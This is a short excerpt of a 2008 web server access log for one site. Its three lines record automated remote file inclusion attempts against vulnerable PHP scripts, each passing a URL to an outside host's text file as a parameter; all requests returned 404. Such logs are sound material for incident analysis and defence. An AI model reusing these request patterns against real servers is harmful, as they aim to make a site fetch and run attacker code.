99.162.124.241 - - [26/Oct/2008:09:42:54 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:43:07 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:43:08 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
